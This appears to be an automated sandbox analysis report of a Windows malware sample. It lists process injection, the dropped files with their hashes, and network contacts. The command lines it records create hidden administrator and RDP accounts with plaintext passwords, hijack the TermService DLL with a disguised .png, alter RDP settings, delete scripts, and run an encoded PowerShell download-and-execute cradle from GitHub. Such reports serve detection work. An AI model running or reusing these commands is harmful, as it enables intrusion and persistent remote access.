Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2392 wrote to memory of 3760 N/A C:\Users\Admin\AppData\Local\Temp\f71c575754e1f5890ad8b35afd08b8be.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2392 wrote to memory of 3760 N/A C:\Users\Admin\AppData\Local\Temp\f71c575754e1f5890ad8b35afd08b8be.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3760 wrote to memory of 1280 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3760 wrote to memory of 1280 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1280 wrote to memory of 2720 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1280 wrote to memory of 2720 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3760 wrote to memory of 3848 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3760 wrote to memory of 3848 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3760 wrote to memory of 4092 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3760 wrote to memory of 4092 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3760 wrote to memory of 684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3760 wrote to memory of 684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3760 wrote to memory of 1980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3760 wrote to memory of 1980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3760 wrote to memory of 68 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3760 wrote to memory of 68 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3760 wrote to memory of 2804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3760 wrote to memory of 2804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3760 wrote to memory of 584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 3760 wrote to memory of 584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 584 wrote to memory of 1524 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 584 wrote to memory of 1524 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3760 wrote to memory of 740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3760 wrote to memory of 740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 740 wrote to memory of 1044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 740 wrote to memory of 1044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1044 wrote to memory of 3748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1044 wrote to memory of 3748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3748 wrote to memory of 4052 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3748 wrote to memory of 4052 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3760 wrote to memory of 3980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3760 wrote to memory of 3980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3980 wrote to memory of 972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3980 wrote to memory of 972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 972 wrote to memory of 372 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 972 wrote to memory of 372 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 372 wrote to memory of 3328 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 372 wrote to memory of 3328 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1264 wrote to memory of 1620 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1264 wrote to memory of 1620 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1620 wrote to memory of 1892 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1620 wrote to memory of 1892 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1912 wrote to memory of 3832 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1912 wrote to memory of 3832 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3832 wrote to memory of 3824 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3832 wrote to memory of 3824 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3736 wrote to memory of 3652 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3736 wrote to memory of 3652 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3652 wrote to memory of 3988 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3652 wrote to memory of 3988 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3748 wrote to memory of 1280 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3748 wrote to memory of 1280 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1280 wrote to memory of 1032 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1280 wrote to memory of 1032 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1784 wrote to memory of 1512 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1784 wrote to memory of 1512 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1512 wrote to memory of 1776 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1512 wrote to memory of 1776 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2804 wrote to memory of 1912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2804 wrote to memory of 1912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1912 wrote to memory of 644 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1912 wrote to memory of 644 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2240 wrote to memory of 1980 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2240 wrote to memory of 1980 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\f71c575754e1f5890ad8b35afd08b8be.exe

"C:\Users\Admin\AppData\Local\Temp\f71c575754e1f5890ad8b35afd08b8be.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dzjrgmon\dzjrgmon.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA212.tmp" "c:\Users\Admin\AppData\Local\Temp\dzjrgmon\CSC56A59F14EE92459EBF46ED605ECECEE3.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc Ghar4f5 /del

C:\Windows\system32\net.exe

net.exe user wgautilacc Ghar4f5 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc LijNdwj5 /add

C:\Windows\system32\net.exe

net.exe user wgautilacc LijNdwj5 /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc LijNdwj5 /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc LijNdwj5

C:\Windows\system32\net.exe

net.exe user wgautilacc LijNdwj5

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc LijNdwj5

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 2no.co udp
DE 88.99.66.31:443 2no.co tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 www.speedtest.net udp
US 151.101.2.219:80 www.speedtest.net tcp
US 151.101.2.219:443 www.speedtest.net tcp
US 151.101.2.219:80 www.speedtest.net tcp
US 8.8.8.8:53 c.speedtest.net udp
US 151.101.2.219:443 c.speedtest.net tcp
US 8.8.8.8:53 speednld.phoenixnap.com udp
NL 185.56.137.2:8080 speednld.phoenixnap.com tcp
US 8.8.8.8:53 speedtest.greenet.nl udp
NL 45.81.168.19:8080 speedtest.greenet.nl tcp
US 8.8.8.8:53 speedtest-ams.melbicom.net udp
NL 194.59.142.202:8080 speedtest-ams.melbicom.net tcp
US 8.8.8.8:53 speedtest.mkbwebhoster.com udp
NL 185.69.61.80:8080 speedtest.mkbwebhoster.com tcp
US 8.8.8.8:53 asfuuvhv3083f.xyz udp

Files

memory/2392-115-0x0000016C75500000-0x0000016C75920000-memory.dmp

memory/2392-118-0x0000016C5C783000-0x0000016C5C785000-memory.dmp

memory/2392-117-0x0000016C5C780000-0x0000016C5C782000-memory.dmp

memory/2392-119-0x0000016C5C785000-0x0000016C5C786000-memory.dmp

memory/2392-120-0x0000016C5C786000-0x0000016C5C787000-memory.dmp

memory/3760-121-0x0000000000000000-mapping.dmp

memory/3760-127-0x0000022699770000-0x0000022699771000-memory.dmp

memory/3760-132-0x00000226B2490000-0x00000226B2491000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 3447df88de7128bdc34942334b2fab98
SHA1 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA256 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA512 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

memory/3760-140-0x00000226991E3000-0x00000226991E5000-memory.dmp

memory/3760-141-0x00000226991E6000-0x00000226991E8000-memory.dmp

memory/3760-139-0x00000226991E0000-0x00000226991E2000-memory.dmp

memory/1280-142-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\dzjrgmon\dzjrgmon.cmdline

MD5 5dfde51bac009acc09ca1386d180eb91
SHA1 eae3446e197188570a62108fba18a7533be854d4
SHA256 fc3f53b5c5a20a2dcf0b43bee8b11daa9c815766695b5b2af309cb51afcf0eb7
SHA512 a21dc36eda573465a5f45a9752bfc530219c3e65b4c71784d2557c0852fc937234f05fb5cb8f57786261da2d8f80e7beeb4682fda3484479f6bf7e53c445ae58

\??\c:\Users\Admin\AppData\Local\Temp\dzjrgmon\dzjrgmon.0.cs

MD5 4864fc038c0b4d61f508d402317c6e9a
SHA1 72171db3eea76ecff3f7f173b0de0d277b0fede7
SHA256 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA512 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

memory/2720-145-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\dzjrgmon\CSC56A59F14EE92459EBF46ED605ECECEE3.TMP

MD5 d100ef4fd304d401b4b4b6b5609de42b
SHA1 954b0ac7da9b65892078e9aeb6c8e93ef1f75d38
SHA256 e1132c3f8e65454e63f2d8715710bb0dc461e74205e7fe6a414914c8ac619123
SHA512 9880f20caa4437a70d47a22a64c2bb56cb1f35343c5aaae65b6c043f40b2e3b05ae99e387f6ba94d1aa21e65fb0da202450de4cf2da9602e4e93d862098ee229

C:\Users\Admin\AppData\Local\Temp\RESA212.tmp

MD5 fbe1d2d9f17a1a7a0e534481748a89fc
SHA1 ee97058aa9ff0ff9b3203fa816f0da9f15492843
SHA256 ecaee54bb025bcaee3a7dbc5c84e2397db77d6a674f577174f0352070f6cb3e8
SHA512 82269332201a75d7f36cdb7509d088d1a2afc679d9f578c7f10f502814a986d94b28b2e1226febb39a53fc3ae021440b647dd0e07fddbf8aff650929c5f74bad

C:\Users\Admin\AppData\Local\Temp\dzjrgmon\dzjrgmon.dll

MD5 5ed1574f5f1b016d4e9bcfd7449b6675
SHA1 71789bd89093ce2a938abb03234ef49d2bdb167a
SHA256 b8ea7f56529dbd8cf6ae452f518f61e661a0875bb8a5bf0a28d64cd63f6687c6
SHA512 24b5bef88868eecd39a9d5d9f9a2a61b01a4d52d36feefbf195ddbd5cd1e4c78c85c58c0fe9b4d4d5ad231fbdb38f2a757cd90655e60954c42aa2eeeae3422de

memory/3760-149-0x00000226997C0000-0x00000226997C1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

MD5 78fc438bc0a10f68012273374fc242de
SHA1 1c2f8f958b4cfb2d822a50f97c1b503d039108d4
SHA256 14249168e782173812af05b444b582847646a69623a3254b8a590ba00365b4e0
SHA512 97d287f9e1ac939505e3ff2b7d6854ae838dd4f0cc3699d157912dcbb116b709b30580baac4c4ce7a5384e28de841dd44f12006c4857bc6a72bc8758427f280e

memory/3760-152-0x00000226991E8000-0x00000226991E9000-memory.dmp

memory/3760-157-0x00000226B2B00000-0x00000226B2B01000-memory.dmp

memory/3760-158-0x00000226B2E90000-0x00000226B2E91000-memory.dmp

memory/3848-165-0x0000000000000000-mapping.dmp

memory/3848-179-0x0000023A1D243000-0x0000023A1D245000-memory.dmp

memory/3848-178-0x0000023A1D240000-0x0000023A1D242000-memory.dmp

memory/3848-182-0x0000023A1D246000-0x0000023A1D248000-memory.dmp

memory/4092-208-0x0000000000000000-mapping.dmp

memory/3848-217-0x0000023A1D248000-0x0000023A1D24A000-memory.dmp

memory/4092-218-0x0000022F32CC0000-0x0000022F32CC2000-memory.dmp

memory/4092-219-0x0000022F32CC3000-0x0000022F32CC5000-memory.dmp

memory/4092-251-0x0000022F32CC6000-0x0000022F32CC8000-memory.dmp

memory/684-256-0x0000000000000000-mapping.dmp

memory/4092-293-0x0000022F32CC8000-0x0000022F32CCA000-memory.dmp

memory/684-295-0x0000020E48F50000-0x0000020E48F52000-memory.dmp

memory/684-297-0x0000020E48F53000-0x0000020E48F55000-memory.dmp

memory/684-298-0x0000020E48F56000-0x0000020E48F58000-memory.dmp

memory/684-308-0x0000020E48F58000-0x0000020E48F5A000-memory.dmp

memory/1980-318-0x0000000000000000-mapping.dmp

memory/68-319-0x0000000000000000-mapping.dmp

memory/2804-320-0x0000000000000000-mapping.dmp

memory/584-357-0x0000000000000000-mapping.dmp

memory/1524-358-0x0000000000000000-mapping.dmp

memory/740-361-0x0000000000000000-mapping.dmp

memory/1044-362-0x0000000000000000-mapping.dmp

memory/3748-363-0x0000000000000000-mapping.dmp

memory/4052-364-0x0000000000000000-mapping.dmp

memory/3980-365-0x0000000000000000-mapping.dmp

memory/972-366-0x0000000000000000-mapping.dmp

memory/372-367-0x0000000000000000-mapping.dmp

memory/3328-368-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 07044622ac01aea214d75af177a9976f
SHA1 8647e016414d4ef1da52abcf889210f15c58a640
SHA256 e83dc368abf546e72a528509e3d2fd8e83153f783832abcef014cddb9da002e9
SHA512 21b30facf460b9c93d32e1a54d6e5e2578f49c782eb3325268f83ad9beb14dd2c06b9b8337161099a69c1ad082583fdf94d20c7c4e2c91063e6bc0e6c9664324

\Windows\Branding\mediasvc.png

MD5 7c2b6a91963747383e5cdb168539962c
SHA1 cd987c6f69702bf0369b4c49c898052fae21d513
SHA256 fc3c17833725d727590ef00fdf3f8d70f52d4c13a9cf52a77b6e74e22d7dae61
SHA512 8a952e2e7ac644cb73bc35f1d099f8c9590027f5e5f89771131025ce878c000fec1aeaf708113889e1044094ebbc311ee46f945cca6946860705edac4eec8141

memory/1620-371-0x0000000000000000-mapping.dmp

memory/1892-372-0x0000000000000000-mapping.dmp

memory/3832-373-0x0000000000000000-mapping.dmp

memory/3824-374-0x0000000000000000-mapping.dmp

memory/3652-375-0x0000000000000000-mapping.dmp

memory/3988-376-0x0000000000000000-mapping.dmp

memory/1280-377-0x0000000000000000-mapping.dmp

memory/1032-378-0x0000000000000000-mapping.dmp

memory/1512-379-0x0000000000000000-mapping.dmp

memory/1776-380-0x0000000000000000-mapping.dmp

memory/1912-381-0x0000000000000000-mapping.dmp

memory/644-382-0x0000000000000000-mapping.dmp

memory/1980-383-0x0000000000000000-mapping.dmp

memory/1032-384-0x0000000000000000-mapping.dmp

memory/3812-385-0x0000000000000000-mapping.dmp

memory/4020-386-0x0000000000000000-mapping.dmp

memory/4020-396-0x00000198ECB30000-0x00000198ECB32000-memory.dmp

memory/4020-398-0x00000198ECB33000-0x00000198ECB35000-memory.dmp

memory/4020-404-0x00000198ECB36000-0x00000198ECB38000-memory.dmp

memory/4020-431-0x00000198ECB38000-0x00000198ECB39000-memory.dmp

memory/3180-469-0x0000000000000000-mapping.dmp

memory/1044-470-0x0000000000000000-mapping.dmp